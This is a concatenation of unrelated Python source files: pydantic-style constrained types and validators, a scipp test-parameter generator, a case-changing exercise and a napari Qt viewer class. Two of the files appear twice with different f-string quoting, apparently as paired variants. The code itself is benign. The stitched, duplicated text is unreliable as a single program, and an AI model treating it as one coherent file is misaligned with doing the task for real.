OptionalIntFloatDecimal = None lt: OptionalIntFloatDecimal = None le: OptionalIntFloatDecimal = None max_digits: OptionalInt = None decimal_places: OptionalInt = None multiple_of: OptionalIntFloatDecimal = None @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: update_not_none( field_schema, exclusiveMinimum=cls.gt, exclusiveMaximum=cls.lt, minimum=cls.ge, maximum=cls.le, multipleOf=cls.multiple_of, ) @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield decimal_validator yield number_size_validator yield number_multiple_validator yield cls.validate @classmethod def validate(cls, value: Decimal) -> Decimal: digit_tuple, exponent = value.as_tuple()[1:] if exponent in {'F', 'n', 'N'}: raise errors.DecimalIsNotFiniteError() if exponent >= 0: # A positive exponent adds that many trailing zeros. digits = len(digit_tuple) + exponent decimals = 0 else: # If the absolute value of the negative exponent is larger than the # number of digits, then it's the same as the number of digits, # because it'll consume all of the digits in digit_tuple and then # add abs(exponent) - len(digit_tuple) leading zeros after the # decimal point. if abs(exponent) > len(digit_tuple): digits = decimals = abs(exponent) else: digits = len(digit_tuple) decimals = abs(exponent) whole_digits = digits - decimals if cls.max_digits is not None and digits > cls.max_digits: raise errors.DecimalMaxDigitsError(max_digits=cls.max_digits) if cls.decimal_places is not None and decimals > cls.decimal_places: raise errors.DecimalMaxPlacesError(decimal_places=cls.decimal_places) if cls.max_digits is not None and cls.decimal_places is not None: expected = cls.max_digits - cls.decimal_places if whole_digits > expected: raise errors.DecimalWholeDigitsError(whole_digits=expected) return value def condecimal( *, gt: Decimal = None, ge: Decimal = None, lt: Decimal = None, le: Decimal = None, max_digits: int = None, decimal_places: int = None, multiple_of: Decimal = None, ) -> Type[Decimal]: # use kwargs then define conf in a dict to aid with IDE type hinting namespace = dict( gt=gt, ge=ge, lt=lt, le=le, max_digits=max_digits, decimal_places=decimal_places, multiple_of=multiple_of ) return type('ConstrainedDecimalValue', (ConstrainedDecimal,), namespace) class UUID1(UUID): _required_version = 1 @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(type='string', format=f'uuid{cls._required_version}') class UUID3(UUID1): _required_version = 3 class UUID4(UUID1): _required_version = 4 class UUID5(UUID1): _required_version = 5 class FilePath(Path): @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(format='file-path') @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield path_validator yield path_exists_validator yield cls.validate @classmethod def validate(cls, value: Path) -> Path: if not value.is_file(): raise errors.PathNotAFileError(path=value) return value class DirectoryPath(Path): @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(format='directory-path') @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield path_validator yield path_exists_validator yield cls.validate @classmethod def validate(cls, value: Path) -> Path: if not value.is_dir(): raise errors.PathNotADirectoryError(path=value) return value class JsonWrapper: pass class JsonMeta(type): def __getitem__(self, t: Type[Any]) -> Type[JsonWrapper]: return type('JsonWrapperValue', (JsonWrapper,), {'inner_type': t}) class Json(metaclass=JsonMeta): @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(type='string', format='json-string') class SecretStr: @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(type='string', writeOnly=True, format='password') @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.validate @classmethod def validate(cls, value: Any) -> 'SecretStr': if isinstance(value, cls): return value value = str_validator(value) return cls(value) def __init__(self, value: str): self._secret_value = value def __repr__(self) -> str: return f"SecretStr('{self}')" def __str__(self) -> str: return '**********' if self._secret_value else '' def __eq__(self, other: Any) -> bool: return isinstance(other, SecretStr) and self.get_secret_value() == other.get_secret_value() def display(self) -> str: warnings.warn('`secret_str.display()` is deprecated, use `str(secret_str)` instead', DeprecationWarning) return str(self) def get_secret_value(self) -> str: return self._secret_value class SecretBytes: @classmethod def __modify_schema__(cls, field_schema: Dict[str, Any]) -> None: field_schema.update(type='string', writeOnly=True, format='password') @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.validate @classmethod def validate(cls, value: Any) -> 'SecretBytes': if isinstance(value, cls): return value value = bytes_validator(value) return cls(value) def __init__(self, value: bytes): self._secret_value = value def __repr__(self) -> str: return f"SecretBytes(b'{self}')" def __str__(self) -> str: return '**********' if self._secret_value else '' def __eq__(self, other: Any) -> bool: return isinstance(other, SecretBytes) and self.get_secret_value() == other.get_secret_value() def display(self) -> str: warnings.warn('`secret_bytes.display()` is deprecated, use `str(secret_bytes)` instead', DeprecationWarning) return str(self) def get_secret_value(self) -> bytes: return self._secret_value class PaymentCardBrand(str, Enum): amex = 'American Express' mastercard = 'Mastercard' visa = 'Visa' other = 'other' def __str__(self) -> str: return self.value class PaymentCardNumber(str): """ Based on: https://en.wikipedia.org/wiki/Payment_card_number """ strip_whitespace: ClassVar[bool] = True min_length: ClassVar[int] = 12 max_length: ClassVar[int] = 19 bin: str last4: str brand: PaymentCardBrand def __init__(self, card_number: str): self.bin = card_number[:6] self.last4 = card_number[-4:] self.brand = self._get_brand(card_number) @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield str_validator yield constr_strip_whitespace yield constr_length_validator yield cls.validate_digits yield cls.validate_luhn_check_digit yield cls yield cls.validate_length_for_brand @property def masked(self) -> str: num_masked = len(self) - 10 # len(bin) + len(last4) == 10 return f'{self.bin}{"*" * num_masked}{self.last4}' @classmethod def validate_digits(cls, card_number: str) -> str: if not card_number.isdigit(): raise errors.NotDigitError return card_number @classmethod def validate_luhn_check_digit(cls, card_number: str) -> str: """ Based on: https://en.wikipedia.org/wiki/Luhn_algorithm """ sum_ = int(card_number[-1]) length = len(card_number) parity = length % 2 for i in range(length - 1): digit = int(card_number[i]) if i % 2 == parity: digit *= 2 if digit > 9: digit -= 9 sum_ += digit valid = sum_ % 10 == 0 if not valid: raise errors.LuhnValidationError return card_number @classmethod def validate_length_for_brand(cls, card_number: 'PaymentCardNumber') -> 'PaymentCardNumber': """ Validate length based on BIN for major brands: https://en.wikipedia.org/wiki/Payment_card_number#Issuer_identification_number_(IIN) """ required_length: Optional[int] = None if card_number.brand in {PaymentCardBrand.visa, PaymentCardBrand.mastercard}: required_length = 16 valid = len(card_number) == required_length elif card_number.brand == PaymentCardBrand.amex: required_length = 15 valid = len(card_number) == required_length else: valid = True if not valid: raise errors.InvalidLengthForBrand(brand=card_number.brand, required_length=required_length) return card_number @staticmethod def _get_brand(card_number: str) -> PaymentCardBrand: if card_number[0] == '4': brand = PaymentCardBrand.visa elif 51 <= int(card_number[:2]) <= 55: brand = PaymentCardBrand.mastercard elif card_number[:2] in {'34', '37'}: brand = PaymentCardBrand.amex else: brand = PaymentCardBrand.other return brand BYTE_SIZES = { 'b': 1, 'kb': 10 ** 3, 'mb': 10 ** 6, 'gb': 10 ** 9, 'tb': 10 ** 12, 'pb': 10 ** 15, 'eb': 10 ** 18, 'kib': 2 ** 10, 'mib': 2 ** 20, 'gib': 2 ** 30, 'tib': 2 ** 40, 'pib': 2 ** 50, 'eib': 2 ** 60, } BYTE_SIZES.update({k.lower()[0]: v for k, v in BYTE_SIZES.items() if 'i' not in k}) byte_string_re = re.compile(r'^\s*(\d*\.?\d+)\s*(\w+)?', re.IGNORECASE) class ByteSize(int): @classmethod def __get_validators__(cls) -> 'CallableGenerator': yield cls.validate @classmethod def validate(cls, v: StrIntFloat) -> 'ByteSize': try: return cls(int(v)) except ValueError: pass str_match = byte_string_re.match(str(v)) if str_match is None: raise errors.InvalidByteSize() scalar, unit = str_match.groups() if unit is None: unit = 'b' try: unit_mult = BYTE_SIZES[unit.lower()] except KeyError: raise errors.InvalidByteSizeUnit(unit=unit) return cls(int(float(scalar) * unit_mult)) def human_readable(self, decimal: bool = False) -> str: if decimal: divisor = 1000 units = ['B', 'KB', 'MB', 'GB', 'TB', 'PB'] final_unit = 'EB' else: divisor = 1024 units = ['B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB'] final_unit = 'EiB' num = float(self) for unit in units: if abs(num) < divisor: return f'{num:0.1f}{unit}' num /= divisor return f'{num:0.1f}{final_unit}' def to(self, unit: str) -> float: try: unit_div = BYTE_SIZES[unit.lower()] except KeyError: raise errors.InvalidByteSizeUnit(unit=unit) return self / unit_div
# SPDX-License-Identifier: BSD-3-Clause # Copyright (c) 2021 Scipp contributors (https://github.com/scipp) """ This script generates input parameters to test whether arithmetic operations are consistent with Python. It takes the output file as its only command line argument. """ from itertools import product import sys import numpy as np def format_number(x): if np.isposinf(x): return 'INFINITY' if np.isneginf(x): return '-INFINITY' if np.isnan(x): return f'{'-' if np.sign(x) == -1 else ''}NAN' return f'{x}' def build_param(a, b): # implement behavior of numpy 1.20 sign = -1 if np.sign(a) == -1 or np.sign(b) == -1 else 1 fd = sign * np.inf if ((isinstance(a, float) or isinstance(b, float)) and b == 0 and a != 0) \ else np.floor_divide(a, b) return f'Params{{{a}, {b}, {format_number(np.true_divide(a, b))},' + \ f' {format_number(fd)}, {format_number(np.remainder(a, b))}}}' def gen_values(dtype): return np.r_[np.arange(3, -4, -1), np.random.uniform(-10, 10, 5)] \ .astype(dtype) def main(): np.random.seed(14653503) with open(sys.argv[1], 'w') as outf: outf.write('// SPDX-License-Identifier: BSD-3-Clause\n') outf.write('// Copyright (c) 2021 Scipp contributors ' '(https://github.com/scipp)\n') outf.write('// clang-format off\n') outf.write('/*\n') outf.write(' * This file was automatically generated\n') outf.write(' * DO NOT CHANGE!\n') outf.write(' */\n\n') outf.write('#include <array>\n\n') outf.write('#include <cmath>\n\n') outf.write('namespace {\n') name_and_dtype = (("int", int), ("float", float)) for (a_name, a_dtype), (b_name, b_dtype) in product(name_and_dtype, name_and_dtype): outf.write('template <class Params>\n') outf.write('constexpr inline auto ' f'division_params_{a_name}_{b_name} = std::array{{\n') for a, b in product(gen_values(a_dtype), gen_values(b_dtype)): outf.write(build_param(a, b) + ',\n') outf.write('};\n') outf.write('} // namespace\n') outf.write('// clang-format on\n') if __name__ == "__main__": main()
# SPDX-License-Identifier: BSD-3-Clause # Copyright (c) 2021 Scipp contributors (https://github.com/scipp) """ This script generates input parameters to test whether arithmetic operations are consistent with Python. It takes the output file as its only command line argument. """ from itertools import product import sys import numpy as np def format_number(x): if np.isposinf(x): return 'INFINITY' if np.isneginf(x): return '-INFINITY' if np.isnan(x): return f'{"-" if np.sign(x) == -1 else ""}NAN' return f'{x}' def build_param(a, b): # implement behavior of numpy 1.20 sign = -1 if np.sign(a) == -1 or np.sign(b) == -1 else 1 fd = sign * np.inf if ((isinstance(a, float) or isinstance(b, float)) and b == 0 and a != 0) \ else np.floor_divide(a, b) return f'Params{{{a}, {b}, {format_number(np.true_divide(a, b))},' + \ f' {format_number(fd)}, {format_number(np.remainder(a, b))}}}' def gen_values(dtype): return np.r_[np.arange(3, -4, -1), np.random.uniform(-10, 10, 5)] \ .astype(dtype) def main(): np.random.seed(14653503) with open(sys.argv[1], 'w') as outf: outf.write('// SPDX-License-Identifier: BSD-3-Clause\n') outf.write('// Copyright (c) 2021 Scipp contributors ' '(https://github.com/scipp)\n') outf.write('// clang-format off\n') outf.write('/*\n') outf.write(' * This file was automatically generated\n') outf.write(' * DO NOT CHANGE!\n') outf.write(' */\n\n') outf.write('#include <array>\n\n') outf.write('#include <cmath>\n\n') outf.write('namespace {\n') name_and_dtype = (("int", int), ("float", float)) for (a_name, a_dtype), (b_name, b_dtype) in product(name_and_dtype, name_and_dtype): outf.write('template <class Params>\n') outf.write('constexpr inline auto ' f'division_params_{a_name}_{b_name} = std::array{{\n') for a, b in product(gen_values(a_dtype), gen_values(b_dtype)): outf.write(build_param(a, b) + ',\n') outf.write('};\n') outf.write('} // namespace\n') outf.write('// clang-format on\n') if __name__ == "__main__": main()
word = input("Enter a word: ") print(f"The word in exchanged case is: {word.swapcase()}") print("----------------------------------") alt_word = [word[i].upper() if not i % 2 else word[i].lower() for i in range(len(word))] print(f"The word in alternating upper and lower case is: {"".join(alt_word)}") print("----------------------------------") alt_word_2 = [word[i].upper() if not i % 2 else word[i].lower() for i in range(len(word))] print(f"The word in alternating lower and upper case is: {"".join(alt_word_2)}") print("----------------------------------") half = int(len(word)/2) upFirst = word[:half].upper() + word[half:].lower() print(f"The word with an upshifted first half is: {upFirst}") print("----------------------------------") upSecond = word[:half].lower() + word[half:].upper() print(f"The word with an upshifted second half is: {upSecond}") print("----------------------------------")
word = input("Enter a word: ") print(f"The word in exchanged case is: {word.swapcase()}") print("----------------------------------") alt_word = [word[i].upper() if not i % 2 else word[i].lower() for i in range(len(word))] print(f"The word in alternating upper and lower case is: {''.join(alt_word)}") print("----------------------------------") alt_word_2 = [word[i].upper() if not i % 2 else word[i].lower() for i in range(len(word))] print(f"The word in alternating lower and upper case is: {''.join(alt_word_2)}") print("----------------------------------") half = int(len(word)/2) upFirst = word[:half].upper() + word[half:].lower() print(f"The word with an upshifted first half is: {upFirst}") print("----------------------------------") upSecond = word[:half].lower() + word[half:].upper() print(f"The word with an upshifted second half is: {upSecond}") print("----------------------------------")
import os.path from copy import copy from pathlib import Path import numpy as np from qtpy.QtCore import QCoreApplication, QSize, Qt from qtpy.QtGui import QCursor, QGuiApplication from qtpy.QtWidgets import ( QFileDialog, QMessageBox, QSplitter, QVBoxLayout, QWidget, ) from vispy.scene import ArcballCamera, PanZoomCamera, SceneCanvas from vispy.visuals.transforms import ChainTransform from ..resources import get_stylesheet from ..utils import perf from ..utils.interactions import ( ReadOnlyWrapper, mouse_move_callbacks, mouse_press_callbacks, mouse_release_callbacks, mouse_wheel_callbacks, ) from ..utils.io import imsave from ..utils.key_bindings import components_to_key_combo from ..utils.theme import template from .dialogs.qt_about_key_bindings import QtAboutKeyBindings from .dialogs.screenshot_dialog import ScreenshotDialog from .tracing.qt_performance import QtPerformance from .utils import QImg2array, circle_pixmap, square_pixmap from .widgets.qt_dims import QtDims from .widgets.qt_layerlist import QtLayerList from .widgets.qt_viewer_buttons import QtLayerButtons, QtViewerButtons from .widgets.qt_viewer_dock_widget import QtViewerDockWidget from .._vispy import VispyAxesVisual, create_vispy_visual # isort:skip class KeyModifierFilterSceneCanvas(SceneCanvas): """SceneCanvas overriding VisPy when mouse wheel events have modifiers.""" def _process_mouse_event(self, event): if event.type == 'mouse_wheel' and len(event.modifiers) > 0: return super()._process_mouse_event(event) class QtViewer(QSplitter): """Qt view for the napari Viewer model. Parameters ---------- viewer : napari.components.ViewerModel Napari viewer containing the rendered scene, layers, and controls. Attributes ---------- canvas : vispy.scene.SceneCanvas Canvas for rendering the current view. console : QtConsole iPython console terminal integrated into the napari GUI. controls : QtLayerControlsContainer Qt view for GUI controls. dims : napari.qt_dims.QtDims Dimension sliders; Qt View for Dims model. dockConsole : QtViewerDockWidget QWidget wrapped in a QDockWidget with forwarded viewer events. aboutKeybindings : QtAboutKeybindings Key bindings for the 'About' Qt dialog. dockLayerControls : QtViewerDockWidget QWidget wrapped in a QDockWidget with forwarded viewer events. dockLayerList : QtViewerDockWidget QWidget wrapped in a QDockWidget with forwarded viewer events. layerButtons : QtLayerButtons Button controls for napari layers. layers : QtLayerList Qt view for LayerList controls. layer_to_visual : dict Dictionary mapping napari layers with their corresponding vispy_layers. view : vispy scene widget View displayed by vispy canvas. Adds a vispy ViewBox as a child widget. viewer : napari.components.ViewerModel Napari viewer containing the rendered scene, layers, and controls. viewerButtons : QtViewerButtons Button controls for the napari viewer. """ raw_stylesheet = get_stylesheet() def __init__(self, viewer): from .layer_controls import QtLayerControlsContainer super().__init__() self.setAttribute(Qt.WA_DeleteOnClose) QCoreApplication.setAttribute( Qt.AA_UseStyleSheetPropagationInWidgetStyles, True ) self.viewer = viewer self.dims = QtDims(self.viewer.dims) self.controls = QtLayerControlsContainer(self.viewer) self.layers = QtLayerList(self.viewer.layers) self.layerButtons = QtLayerButtons(self.viewer) self.viewerButtons = QtViewerButtons(self.viewer) self._console = None layerList = QWidget() layerList.setObjectName('layerList') layerListLayout = QVBoxLayout() layerListLayout.addWidget(self.layerButtons) layerListLayout.addWidget(self.layers) layerListLayout.addWidget(self.viewerButtons) layerListLayout.setContentsMargins(8, 4, 8, 6) layerList.setLayout(layerListLayout) self.dockLayerList = QtViewerDockWidget( self, layerList, name='layer list', area='left', allowed_areas=['left', 'right'], ) self.dockLayerControls = QtViewerDockWidget( self, self.controls, name='layer controls', area='left', allowed_areas=['left', 'right'], ) self.dockConsole = QtViewerDockWidget( self, QWidget(), name='console', area='bottom', allowed_areas=['top', 'bottom'], shortcut='Ctrl+Shift+C', ) self.dockConsole.setVisible(False) # because the console is loaded lazily in the @getter, this line just # gets (or creates) the console when the dock console is made visible. self.dockConsole.visibilityChanged.connect( lambda visible: self.console if visible else None ) self.dockLayerControls.visibilityChanged.connect(self._constrain_width) self.dockLayerList.setMaximumWidth(258) self.dockLayerList.setMinimumWidth(258) self.dockPerformance = self._create_performance_dock_widget() # This dictionary holds the corresponding vispy visual for each layer self.layer_to_visual = {} self.viewerButtons.consoleButton.clicked.connect( self.toggle_console_visibility ) self.canvas = KeyModifierFilterSceneCanvas( keys=None, vsync=True, parent=self ) self.canvas.events.ignore_callback_errors = False self.canvas.events.draw.connect(self.dims.enable_play) self.canvas.native.setMinimumSize(QSize(200, 200)) self.canvas.context.set_depth_func('lequal') self.canvas.connect(self.on_mouse_move) self.canvas.connect(self.on_mouse_press) self.canvas.connect(self.on_mouse_release) self.canvas.connect(self.on_key_press) self.canvas.connect(self.on_key_release) self.canvas.connect(self.on_mouse_wheel) self.canvas.connect(self.on_draw) self.view = self.canvas.central_widget.add_view() self._update_camera() self.axes = VispyAxesVisual( self.viewer.axes, self.viewer.dims, parent=self.view.scene, order=1e6, ) main_widget = QWidget() main_layout = QVBoxLayout() main_layout.setContentsMargins(10, 22, 10, 2) main_layout.addWidget(self.canvas.native) main_layout.addWidget(self.dims) main_layout.setSpacing(10) main_widget.setLayout(main_layout) self.setOrientation(Qt.Vertical) self.addWidget(main_widget) self._last_visited_dir = str(Path.home()) self._cursors = { 'cross': Qt.CrossCursor, 'forbidden': Qt.ForbiddenCursor, 'pointing': Qt.PointingHandCursor, 'standard': QCursor(), } self._update_palette() self.viewer.events.interactive.connect(self._on_interactive) self.viewer.events.cursor.connect(self._on_cursor) self.viewer.events.reset_view.connect(self._on_reset_view) self.viewer.events.palette.connect(self._update_palette) self.viewer.layers.events.reordered.connect(self._reorder_layers) self.viewer.layers.events.added.connect(self._add_layer) self.viewer.layers.events.removed.connect(self._remove_layer) self.viewer.dims.events.camera.connect( lambda event: self._update_camera() ) # stop any animations whenever the layers change self.viewer.events.layers_change.connect(lambda x: self.dims.stop()) self.setAcceptDrops(True) def _create_performance_dock_widget(self): """Create the dock widget that shows performance metrics. """ if not perf.USE_PERFMON: return None return QtViewerDockWidget( self, QtPerformance(), name='performance', area='bottom', shortcut='Ctrl+Shift+P', ) @property def console(self): """QtConsole: iPython console terminal integrated into the napari GUI. """ if self._console is None: from .widgets.qt_console import QtConsole self.console = QtConsole({'viewer': self.viewer}) return self._console @console.setter def console(self, console): self._console = console self.dockConsole.widget = console self._update_palette() def _constrain_width(self, event): """Allow the layer controls to be wider, only if floated. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ if self.dockLayerControls.isFloating(): self.controls.setMaximumWidth(700) else: self.controls.setMaximumWidth(220) def _add_layer(self, event): """When a layer is added, set its parent and order. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ layers = event.source layer = event.item vispy_layer = create_vispy_visual(layer) vispy_layer.node.parent = self.view.scene vispy_layer.order = len(layers) - 1 self.layer_to_visual[layer] = vispy_layer def _remove_layer(self, event): """When a layer is removed, remove its parent. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ layer = event.item vispy_layer = self.layer_to_visual[layer] vispy_layer.node.transforms = ChainTransform() vispy_layer.node.parent = None del vispy_layer self._reorder_layers(None) def _reorder_layers(self, event): """When the list is reordered, propagate changes to draw order. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ for i, layer in enumerate(self.viewer.layers): vispy_layer = self.layer_to_visual[layer] vispy_layer.order = i self.canvas._draw_order.clear() self.canvas.update() def _update_camera(self): """Update the viewer camera.""" if self.viewer.dims.ndisplay == 3: # Set a 3D camera if not isinstance(self.view.camera, ArcballCamera): self.view.camera = ArcballCamera(name="ArcballCamera", fov=0) # flip y-axis to have correct alignment # self.view.camera.flip = (0, 1, 0) self.view.camera.viewbox_key_event = viewbox_key_event self.viewer.reset_view() else: # Set 2D camera if not isinstance(self.view.camera, PanZoomCamera): self.view.camera = PanZoomCamera( aspect=1, name="PanZoomCamera" ) # flip y-axis to have correct alignment self.view.camera.flip = (0, 1, 0) self.view.camera.viewbox_key_event = viewbox_key_event self.viewer.reset_view() def _save_layers_dialog(self, selected=False): """Save layers (all or selected) to disk, using ``LayerList.save()``. Parameters ---------- selected : bool If True, only layers that are selected in the viewer will be saved. By default, all layers are saved. """ msg = '' if not len(self.viewer.layers): msg = "There are no layers in the viewer to save" elif selected and not len(self.viewer.layers.selected): msg = ( 'Please select one or more layers to save,' '\nor use "Save all layers..."' ) if msg: QMessageBox.warning(self, "Nothing to save", msg, QMessageBox.Ok) return filename, _ = QFileDialog.getSaveFileName( parent=self, caption=f'Save {'selected' if selected else 'all'} layers', directory=self._last_visited_dir, # home dir by default ) if filename: self.viewer.layers.save(filename, selected=selected) def screenshot(self, path=None): """Take currently displayed screen and convert to an image array. Parameters ---------- path : str Filename for saving screenshot image. Returns ------- image : array Numpy array of type ubyte and shape (h, w, 4). Index [0, 0] is the upper-left corner of the rendered region. """ img = QImg2array(self.canvas.native.grabFramebuffer()) if path is not None: imsave(path, img) # scikit-image imsave method return img def _screenshot_dialog(self): """Save screenshot of current display, default .png""" dial = ScreenshotDialog(self.screenshot, self, self._last_visited_dir) if dial.exec_(): self._last_visited_dir = os.path.dirname(dial.selectedFiles()[0]) def _open_files_dialog(self): """Add files from the menubar.""" filenames, _ = QFileDialog.getOpenFileNames( parent=self, caption='Select file(s)...', directory=self._last_visited_dir, # home dir by default ) if (filenames != []) and (filenames is not None): self.viewer.open(filenames) def _open_files_dialog_as_stack_dialog(self): """Add files as a stack, from the menubar.""" filenames, _ = QFileDialog.getOpenFileNames( parent=self, caption='Select files...', directory=self._last_visited_dir, # home dir by default ) if (filenames != []) and (filenames is not None): self.viewer.open(filenames, stack=True) def _open_folder_dialog(self): """Add a folder of files from the menubar.""" folder = QFileDialog.getExistingDirectory( parent=self, caption='Select folder...', directory=self._last_visited_dir, # home dir by default ) if folder not in {'', None}: self.viewer.open([folder]) def _on_interactive(self, event): """Link interactive attributes of view and viewer. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ self.view.interactive = self.viewer.interactive def _on_cursor(self, event): """Set the appearance of the mouse cursor. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ cursor = self.viewer.cursor if cursor == 'square': size = self.viewer.cursor_size # make sure the square fits within the current canvas if size < 8 or size > ( min(*self.viewer.window.qt_viewer.canvas.size) - 4 ): q_cursor = self._cursors['cross'] else: q_cursor = QCursor(square_pixmap(size)) elif cursor == 'circle': size = self.viewer.cursor_size q_cursor = QCursor(circle_pixmap(size)) else: q_cursor = self._cursors[cursor] self.canvas.native.setCursor(q_cursor) def _on_reset_view(self, event): """Reset view of the rendered scene. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ if isinstance(self.view.camera, ArcballCamera): quat = self.view.camera._quaternion.create_from_axis_angle( *event.quaternion ) self.view.camera._quaternion = quat self.view.camera.center = event.center self.view.camera.scale_factor = event.scale_factor else: # Assumes default camera has the same properties as PanZoomCamera self.view.camera.rect = event.rect def _update_palette(self, event=None): """Update the napari GUI theme.""" # template and apply the primary stylesheet themed_stylesheet = template( self.raw_stylesheet, **self.viewer.palette ) if self._console is not None: self.console._update_palette( self.viewer.palette, themed_stylesheet ) self.setStyleSheet(themed_stylesheet) self.canvas.bgcolor = self.viewer.palette['canvas'] self.viewer.axes.background_color = self.viewer.palette['canvas'] def toggle_console_visibility(self, event=None): """Toggle console visible and not visible. Imports the console the first time it is requested. """ # force instantiation of console if not already instantiated _ = self.console viz = not self.dockConsole.isVisible() # modulate visibility at the dock widget level as console is docakable self.dockConsole.setVisible(viz) if self.dockConsole.isFloating(): self.dockConsole.setFloating(True) self.viewerButtons.consoleButton.setProperty( 'expanded', self.dockConsole.isVisible() ) self.viewerButtons.consoleButton.style().unpolish( self.viewerButtons.consoleButton ) self.viewerButtons.consoleButton.style().polish( self.viewerButtons.consoleButton ) def show_key_bindings_dialog(self, event=None): dialog = QtAboutKeyBindings(self.viewer, parent=self) dialog.show() @property def _canvas2world_scale(self): """list: Scale factors from canvas pixels to world coordinates.""" if isinstance(self.view.camera, PanZoomCamera): return 1 / self.view.camera.transform.scale[0] elif isinstance(self.view.camera, ArcballCamera): # Note magic number 598 is empirically determined so that # Arcball camera and PanZoomCamera match scale_factor = self.view.camera.scale_factor / 598 return scale_factor else: raise ValueError( f'Camera type {type(self.view.camera)} not recognized' ) def _map_canvas2world(self, position): """Map position from canvas pixels into world coordinates. Parameters ---------- position : 2-tuple Position in canvas (x, y). Returns ------- coords : tuple Position in world coordinates, matches the total dimensionality of the viewer. """ nd = self.viewer.dims.ndisplay transform = self.view.camera.transform.inverse mapped_position = transform.map(list(position))[:nd] position_world_slice = mapped_position[::-1] position_world = copy(self.viewer.dims.point) for i, d in enumerate(self.viewer.dims.displayed): position_world[d] = position_world_slice[i] return tuple(position_world) @property def _canvas_corners_in_world(self): """Location of the corners of canvas in world coordinates. Returns ------- corners : 2-tuple Coordinates of top left and bottom right canvas pixel in the world. """ # Find corners of canvas in world coordinates top_left = self._map_canvas2world([0, 0]) bottom_right = self._map_canvas2world(self.canvas.size) return np.array([top_left, bottom_right]) def on_mouse_wheel(self, event): """Called whenever mouse wheel activated in canvas. Parameters ---------- event : qtpy.QtCore.QEvent """ if event.pos is None: return event = ReadOnlyWrapper(event) mouse_wheel_callbacks(self.viewer, event) layer = self.viewer.active_layer if layer is not None: # set cursor position in world coordinates layer.position = self._map_canvas2world(list(event.pos)) mouse_wheel_callbacks(layer, event) def on_mouse_press(self, event): """Called whenever mouse pressed in canvas. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ if event.pos is None: return event = ReadOnlyWrapper(event) mouse_press_callbacks(self.viewer, event) layer = self.viewer.active_layer if layer is not None: # set cursor position in world coordinates layer.position = self._map_canvas2world(list(event.pos)) mouse_press_callbacks(layer, event) def on_mouse_move(self, event): """Called whenever mouse moves over canvas. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ if event.pos is None: return mouse_move_callbacks(self.viewer, event) layer = self.viewer.active_layer if layer is not None: # set cursor position in world coordinates layer.position = self._map_canvas2world(list(event.pos)) mouse_move_callbacks(layer, event) def on_mouse_release(self, event): """Called whenever mouse released in canvas. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ if event.pos is None: return mouse_release_callbacks(self.viewer, event) layer = self.viewer.active_layer if layer is not None: # set cursor position in world coordinates layer.position = self._map_canvas2world(list(event.pos)) mouse_release_callbacks(layer, event) def on_key_press(self, event): """Called whenever key pressed in canvas. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ if ( event.native is not None and event.native.isAutoRepeat() and event.key.name not in ['Up', 'Down', 'Left', 'Right'] ) or event.key is None: # pass if no key is present or if key is held down, unless the # key being held down is one of the navigation keys # this helps for scrolling, etc. return combo = components_to_key_combo(event.key.name, event.modifiers) self.viewer.press_key(combo) def on_key_release(self, event): """Called whenever key released in canvas. Parameters ---------- event : napari.utils.event.Event The napari event that triggered this method. """ if event.key is None or ( # on linux press down is treated as multiple press and release event.native is not None and event.native.isAutoRepeat() ): return combo = components_to_key_combo(event.key.name, event.modifiers) self.viewer.release_key(combo) def on_draw(self, event): """Called whenever the canvas is drawn. This is triggered from vispy whenever new data is sent to the canvas or the camera is moved and is connected in the `QtViewer`. """ scale_factor = self._canvas2world_scale if self.viewer.axes.visible: self.axes.update_scale(scale_factor) for layer in self.viewer.layers: if layer.ndim <= self.viewer.dims.ndim: layer._update_draw( scale_factor=scale_factor, corner_pixels=self._canvas_corners_in_world[ :, -layer.ndim : ], shape_threshold=self.canvas.size, ) def keyPressEvent(self, event): """Called whenever a key is pressed. Parameters ---------- event : qtpy.QtCore.QEvent Event from the Qt context. """ self.canvas._backend._keyEvent(self.canvas.events.key_press, event) event.accept() def keyReleaseEvent(self, event): """Called whenever a key is released. Parameters ---------- event : qtpy.QtCore.QEvent Event from the Qt context. """ self.canvas._backend._keyEvent(self.canvas.events.key_release, event) event.accept() def dragEnterEvent(self, event): """Ignore event if not dragging & dropping a file or URL to open. Using event.ignore() here allows the event to pass through the parent widget to its child widget, otherwise the parent widget would catch the event and not pass it on to the child widget. Parameters ---------- event : qtpy.QtCore.QEvent Event from the Qt context. """ if event.mimeData().hasUrls(): event.accept() else: event.ignore() def dropEvent(self, event): """Add local files and web URLS with drag and drop. Parameters ---------- event : qtpy.QtCore.QEvent Event from the Qt context. """ shift_down = QGuiApplication.keyboardModifiers() & Qt.ShiftModifier filenames = [] for url in event.mimeData().urls(): if url.isLocalFile(): filenames.append(url.toLocalFile()) else: filenames.append(url.toString()) self.viewer.open(filenames, stack=bool(shift_down)) def closeEvent(self, event): """Cleanup and close. Parameters ---------- event : qtpy.QtCore.QEvent Event from the Qt context. """ self.layers.close() # if the viewer.QtDims object is playing an axis, we need to terminate # the AnimationThread before close, otherwise it will cauyse a segFault # or Abort trap. (calling stop() when no animation is occurring is also # not a problem) self.dims.stop() self.canvas.native.deleteLater() if self._console is not None: self.console.close() 